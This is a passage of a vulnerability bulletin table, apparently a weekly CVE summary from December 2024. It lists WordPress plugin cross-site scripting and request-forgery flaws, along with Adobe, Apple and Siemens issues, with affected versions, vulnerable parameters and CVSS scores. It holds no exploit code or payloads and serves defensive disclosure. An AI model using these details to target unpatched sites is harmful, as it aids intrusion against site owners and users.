The FAQ And Answers - Create Frequently Asked Questions Area on WP Sites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'faq' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11882 |
| n/a -- n/a |
The Connatix Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cnx_script_code' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11883 |
| n/a -- n/a |
The Wp photo text slider 50 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-photo-slider' shortcode in all versions up to, and including, 8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11884 |
| n/a -- n/a |
The IDer Login for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ider_login_button' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11888 |
| n/a -- n/a |
The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-search' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11889 |
| n/a -- n/a |
The Perfect Font Awesome Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pfai' shortcode in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11891 |
| n/a -- n/a |
The The Permalinker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'permalink' shortcode in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11894 |
| n/a -- n/a |
The PowerBI Embed Reports plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'MO_API_POWER_BI' shortcode in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11901 |
| n/a -- n/a |
The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp-crowdfunding/search block in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-13 | 6.4 | CVE-2024-11910 |
| n/a -- n/a |
The Gutenberg Blocks and Page Layouts - Attire Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'attire-blocks/post-carousel' block in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11914 |
| n/a -- n/a |
The iChart - Easy Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-10 | 6.4 | CVE-2024-11928 |
| n/a -- n/a |
The Property Hive Mortgage Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'price' parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-10 | 6.4 | CVE-2024-11940 |
| n/a -- n/a |
The Email Reminders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-10 | 6.4 | CVE-2024-11945 |
| n/a -- n/a |
The Post to Pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gmptp_single_post' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12446 |
| n/a -- n/a |
The Posts and Products Views for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'papvfwc_views' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12448 |
| n/a -- n/a |
The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12458 |
| n/a -- n/a |
The Ganohrs Toggle Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'toggle' shortcode in all versions up to, and including, 0.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12459 |
| n/a -- n/a |
The WP-Revive Adserver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprevive_async' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-12461 |
| n/a -- n/a |
The Arena.IM - Live Blogging for real-time events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'arena_embed_amp' shortcode in all versions up to, and including, 0.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-12463 |
| n/a -- n/a |
The Property Hive Stamp Duty Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stamp_duty_calculator_scotland' shortcode in all versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-13 | 6.4 | CVE-2024-12465 |
| n/a -- n/a |
The GeoDataSource Country Region DropDown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gds-country-dropdown' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12474 |
| n/a -- n/a |
The Simple Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12501 |
| n/a -- n/a |
The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-landing' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12502 |
| n/a -- n/a |
The WooCommerce Cart Count Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cart_button' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12517 |
| n/a -- n/a |
The States Map US plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'states_map' shortcode in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-12523 |
| n/a -- n/a |
The The Notibar - Notification Bar for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via njt_nofi_text AJAX action in all versions up to, and including, 2.1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. | 2024-12-13 | 6.3 | CVE-2024-11012 |
| n/a -- n/a |
Acrobat Reader versions 24.005.20307, 24.001.30213, 24.001.30193, 20.005.30730, 20.005.30710 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. This vulnerability allows an attacker to provide malicious XML input containing a reference to an external entity, leading to data disclosure or potentially code execution. Exploitation of this issue requires user interaction in that a victim must process a malicious XML document. | 2024-12-10 | 6.3 | CVE-2024-49535 |
| n/a -- n/a |
The Schema App Structured Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11279 |
| n/a -- n/a |
The Library Bookshelves plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11359 |
| n/a -- n/a |
The dejure.org Vernetzungsfunktion plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.97.5. This is due to missing or incorrect nonce validation on the djo_einstellungen_menue() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11417 |
| n/a -- n/a |
The Password for WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on the get3_init_admin_page() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11419 |
| n/a -- n/a |
The Country Blocker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ip' parameter in all versions up to, and including, 3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11459 |
| n/a -- n/a |
The Filestack Official plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'fstab' and 'filestack_options' parameters in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-14 | 6.1 | CVE-2024-11462 |
| n/a -- n/a |
The Newsletter Subscriptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'token_type' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11683 |
| n/a -- n/a |
The kvCORE IDX plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via any parameter on pages with the kvcoreidx_listings_sitemap_ranges, kvcoreidx_listings_sitemap_page, kvcoreidx_agent_profile_sitemap, or kvcoreidx_agent_profile shortcode present in all versions up to, and including, 2.3.35 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11723 |
| n/a -- n/a |
The Planaday API plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 11.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-11804 |
| n/a -- n/a |
The Primer MyData for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'img_src' parameter in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-13 | 6.1 | CVE-2024-11809 |
| n/a -- n/a |
The Quran multilanguage Text & Audio plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sourate' and 'lang' parameter in all versions up to, and including, 2.3.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-10 | 6.1 | CVE-2024-11973 |
| n/a -- n/a |
The WPC Order Notes for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.2. This is due to missing or incorrect nonce validation on the ajax_update_order_note() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-11 | 6.1 | CVE-2024-12004 |
| n/a -- n/a |
The Analytics Cat - Google Analytics Made Easy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can successfully trick a user into performing an action, such as clicking on a specially crafted link. | 2024-12-12 | 6.1 | CVE-2024-12072 |
| n/a -- n/a |
The AI Content Writer, RSS Feed to Post, Autoblogging SEO Help plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 6.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-12156 |
| n/a -- n/a |
The Seraphinite Bulk Discounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-12160 |
| n/a -- n/a |
The Video & Photo Gallery for Ultimate Member plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-12162 |
| n/a -- n/a |
The WP Service Payment Form With Authorize.net plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-12258 |
| n/a -- n/a |
The Ultimate Endpoints With Rest Api plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-12260 |
| n/a -- n/a |
The WP Pipes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'x1' parameter in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-11 | 6.1 | CVE-2024-12283 |
| n/a -- n/a |
The turboSMTP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link while logged in to turboSMTP. | 2024-12-10 | 6.1 | CVE-2024-12323 |
| n/a -- n/a |
The Waymark plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'content' parameter in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-11 | 6.1 | CVE-2024-12325 |
| n/a -- n/a |
The Website Toolbox Community plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'websitetoolbox_username' parameter in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-12338 |
| n/a -- n/a |
The WP Ad Guru - Banner ad, Responsive popup, Popup maker, Ad rotator & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.1 | CVE-2024-12411 |
| n/a -- n/a |
The Import Eventbrite Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-14 | 6.1 | CVE-2024-12422 |
| n/a -- n/a |
The BP Email Assign Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-12 | 6.1 | CVE-2024-12441 |
| n/a -- n/a |
The SIP Calculator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-14 | 6.1 | CVE-2024-12555 |
| n/a -- n/a |
The Hello In All Languages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-13 | 6.1 | CVE-2024-12572 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 6.1 | CVE-2024-49550 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 6.1 | CVE-2024-54049 |
| n/a -- n/a |
The MyParcel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.24.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Please note this is only exploitable when the WooCommerce store is set to Belgium. | 2024-12-13 | 6.1 | CVE-2024-9608 |
| ujcms -- ujcms |
A vulnerability classified as problematic has been found in Dromara UJCMS up to 9.6.3. This affects an unknown part of the file /users/id of the component User ID Handler. The manipulation leads to authorization bypass. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 5.9 | CVE-2024-12483 |
| apple -- watchos |
A race condition was addressed with additional validation. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An attacker may be able to create a read-only memory mapping that can be written to. | 2024-12-12 | 5.9 | CVE-2024-54494 |
| apple -- iphone_os |
The issue was addressed with improved memory handling. This issue is fixed in iPadOS 17.7.3, macOS Ventura 13.7.2, iOS 18.1 and iPadOS 18.1, macOS Sonoma 14.7.2. Processing a malicious crafted file may lead to a denial-of-service. | 2024-12-12 | 5.5 | CVE-2024-44201 |
| apple -- macos |
A logic issue was addressed with improved file handling. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to access protected user data. | 2024-12-12 | 5.5 | CVE-2024-44300 |
| n/a -- n/a |
Microsoft Office Remote Code Execution Vulnerability | 2024-12-12 | 5.5 | CVE-2024-49065 |
| n/a -- n/a |
Illustrator versions 29.0.0, 28.7.2 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-49541 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-49546 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-49547 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-49548 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-49549 |
| n/a -- n/a |
Media Encoder versions 25.0, 24.6.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial of service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-49554 |
| n/a -- n/a |
A vulnerability has been identified in COMOS V10.3 (All versions < V10.3.3.5.8), COMOS V10.4.0 (All versions), COMOS V10.4.1 (All versions), COMOS V10.4.2 (All versions), COMOS V10.4.3 (All versions < V10.4.3.0.47), COMOS V10.4.4 (All versions < V10.4.4.2), COMOS V10.4.4.1 (All versions < V10.4.4.1.21). The Generic Data Mapper, the Engineering Adapter, and the Engineering Interface improperly handle XML External Entity (XXE) entries when parsing configuration and mapping files. This could allow an attacker to extract any file with a known location on the user's system or accessible network folders by persuading a user to use a maliciously crafted configuration or mapping file in one of the affected components. | 2024-12-10 | 5.5 | CVE-2024-49704 |
| n/a -- n/a |
Substance3D - Modeler versions 1.14.1 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-52833 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-53004 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-53005 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-53006 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-53951 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial of service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 5.5 | CVE-2024-53952 |
| apple -- macos |
The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to access user-sensitive data. | 2024-12-12 | 5.5 | CVE-2024-54474 |
| apple -- macos |
The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to access user-sensitive data. | 2024-12-12 | 5.5 | CVE-2024-54477 |
| apple -- macos |
The issue was resolved by sanitizing logging. This issue is fixed in macOS Sequoia 15.2. An app may be able to access user-sensitive data. | 2024-12-12 | 5.5 | CVE-2024-54484 |
| apple -- watchos |
The issue was addressed with improved checks. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. Processing a maliciously crafted image may result in disclosure of process memory. | 2024-12-12 | 5.5 | CVE-2024-54500 |
| apple -- macos |
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.2. An app may be able to access user-sensitive data. | 2024-12-12 | 5.5 | CVE-2024-54504 |
| apple -- watchos |
A permissions issue was addressed with additional restrictions. This issue is fixed in watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2. An app may be able to access sensitive user data. | 2024-12-12 | 5.5 | CVE-2024-54513 |
| apple -- watchos |
The issue was addressed with improved checks. This issue is fixed in watchOS 11.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. A malicious app may be able to access private information. | 2024-12-12 | 5.5 | CVE-2024-54526 |
| apple -- watchos |
This issue was addressed with improved checks. This issue is fixed in watchOS 11.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to access sensitive user data. | 2024-12-12 | 5.5 | CVE-2024-54527 |
| apple -- macos |
The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.2. An app may be able to bypass kASLR. | 2024-12-12 | 5.5 | CVE-2024-54531 |
| n/a -- n/a |
